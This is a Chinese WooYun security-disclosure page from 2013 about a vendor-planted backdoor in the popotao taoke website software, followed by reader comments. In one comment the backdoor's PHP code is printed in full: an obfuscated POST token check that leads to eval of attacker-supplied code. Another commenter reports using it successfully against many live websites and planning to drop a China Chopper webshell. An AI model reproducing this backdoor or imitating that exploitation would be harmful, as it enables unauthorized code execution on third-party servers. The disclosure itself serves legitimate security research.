漏洞概要
关注数(19)
关注此漏洞
漏洞标题: 泡泡淘(popotao)淘客程序官方后门
提交时间: 2013-02-10 13:15
公开时间: 2013-02-20 15:09
漏洞类型: 文件上传导致任意代码执行
危害等级: 高
自评Rank: 15
漏洞状态:
未联系到厂商或者厂商积极忽略
漏洞详情
披露状态:
2013-02-10: 积极联系厂商并且等待厂商认领中,细节不对外公开
2013-02-20: 厂商已经主动忽略漏洞,细节向公众公开
简要描述:
泡泡淘是一个蛮不错的淘客建站程序,官方网址:http://www.popotao.com。
本人就是他们的用户之一,用他们的程序的网站是:http://www.xiaosajie.com
由于官方几个月不更新,跟不上淘宝API的更新速度,所以我想自己解决,把官方的6个ZEND加密过的PHP文件破解了。结果发现了极其恶心的事情。
详细说明:
在include/admin.func.php文件的最下面,发现以下代码,ZEND加密保护版权还有网站授权认证无可厚非。但是利用加密加入后门。就太可耻了。
漏洞证明:
9月27日的补丁版本
2月4日的补丁
修复方案:
版权声明:转载请注明来源 路人甲@乌云
漏洞回应
漏洞评价:
对本漏洞信息进行评价,以更好的反馈信息的价值,包括信息客观性,内容是否完整以及是否具备学习价值
漏洞评价(共0人评价):
评价
-
2013-02-10 13:46 |
oldcat
( 实习白帽子 |
Rank:88 漏洞数:14 )
0
-
2013-02-11 08:35 |
Coody
( 核心白帽子 |
Rank:1789 漏洞数:213 | 不接单、不黑产;如遇冒名顶替接单收徒、绝...)
0
-
2013-02-11 20:13 |
灵魂天使
( 路人 |
Rank:10 漏洞数:4 | 突然发现 路人甲才是最牛的)
0
-
2013-02-11 22:25 |
Coody
( 核心白帽子 |
Rank:1789 漏洞数:213 | 不接单、不黑产;如遇冒名顶替接单收徒、绝...)
0
-
2013-02-11 22:43 |
oldcat
( 实习白帽子 |
Rank:88 漏洞数:14 )
0
-
2013-02-12 21:58 |
溪水流淌
( 路人 |
Rank:9 漏洞数:2 | 如果一切都任我欲为,我会有迷失在这自由深...)
0
许多程序暗藏后门已经是潜规则了,特别分收费和免费,比如kelink
-
2013-02-13 09:44 |
xsser
( 普通白帽子 |
Rank:297 漏洞数:22 | 当我又回首一切,这个世界会好吗?)
0
@灵魂天使 @Coody @溪水流淌 我只能呵呵了
-
2013-02-13 12:29 |
灵魂天使
( 路人 |
Rank:10 漏洞数:4 | 突然发现 路人甲才是最牛的)
0
@Coody @oldcat @xsser 貌似有人博客8号就公开这个了 检测了好几个后门都用不了 难道又改调用字符了
-
2013-02-13 12:56 |
oldcat
( 实习白帽子 |
Rank:88 漏洞数:14 )
0
在include/admin.func.php文件的最下面,存在以下代码。
if ( isset( $_POST['_tks'] ) && ( $tks = trim( $_POST['_tks'] ) ) )
{
$_tks = explode( “|”, ~base64_decode( strrev( substr( $tks, 3, 5 ). substr( $tks, 8 ) . substr( $tks, 0, 3 ) ) ) );
if ( trim( $_tks[1] ) == “K_”.date( “Y_m_d” ) && ( strpos( $_SERVER['HTTP_HOST'], trim( $_tks[0] ) ) !== FALSE || strpos( $_SERVER['SERVER_NAME'], trim( $_tks[0] ) ) !== FALSE ) )
{
eval( $_POST['tao'] );
}
exit( );
}
-
2013-02-13 13:13 |
灵魂天使
( 路人 |
Rank:10 漏洞数:4 | 突然发现 路人甲才是最牛的)
0
-
2013-02-13 14:05 |
灵魂天使
( 路人 |
Rank:10 漏洞数:4 | 突然发现 路人甲才是最牛的)
0
-
2013-02-13 14:06 |
Coody
( 核心白帽子 |
Rank:1789 漏洞数:213 | 不接单、不黑产;如遇冒名顶替接单收徒、绝...)
0
-
2013-02-13 14:29 |
灵魂天使
( 路人 |
Rank:10 漏洞数:4 | 突然发现 路人甲才是最牛的)
0
@Coody 成功了 换了下调用参数 靠啊 卑鄙 好多网站都成功了
-
2013-02-13 14:32 |
Coody
( 核心白帽子 |
Rank:1789 漏洞数:213 | 不接单、不黑产;如遇冒名顶替接单收徒、绝...)
0
-
2013-02-13 16:37 |
灵魂天使
( 路人 |
Rank:10 漏洞数:4 | 突然发现 路人甲才是最牛的)
0
@Coody 淫荡啊 一个网站一个句话密码 还post什么啊 直接上菜刀了
-
2013-02-13 17:41 |
Coody
( 核心白帽子 |
Rank:1789 漏洞数:213 | 不接单、不黑产;如遇冒名顶替接单收徒、绝...)
0
-
2013-02-15 16:23 |
Black Angel
( 普通白帽子 |
Rank:165 漏洞数:36 | 最神奇的一群人,智慧低调又内敛,俗称马甲...)
0
-
2013-02-18 08:45 |
LeadUrLife
( 普通白帽子 |
Rank:103 漏洞数:14 | 好好学习 天天向上)
0
@Black Angel 这个路人甲却是牛逼:http://www.sablog.net/blog/archives/604/
-
2013-02-18 16:22 |
冷静
( 路人 |
Rank:3 漏洞数:2 )
0
-
2013-03-21 02:27 |
also
( 普通白帽子 |
Rank:434 漏洞数:53 | 招渗透/php/前端/ios&android安全,广州)
0
@xsser 下次是zend或者其他加密的,直接解密后,用find来查关键函数,你懂的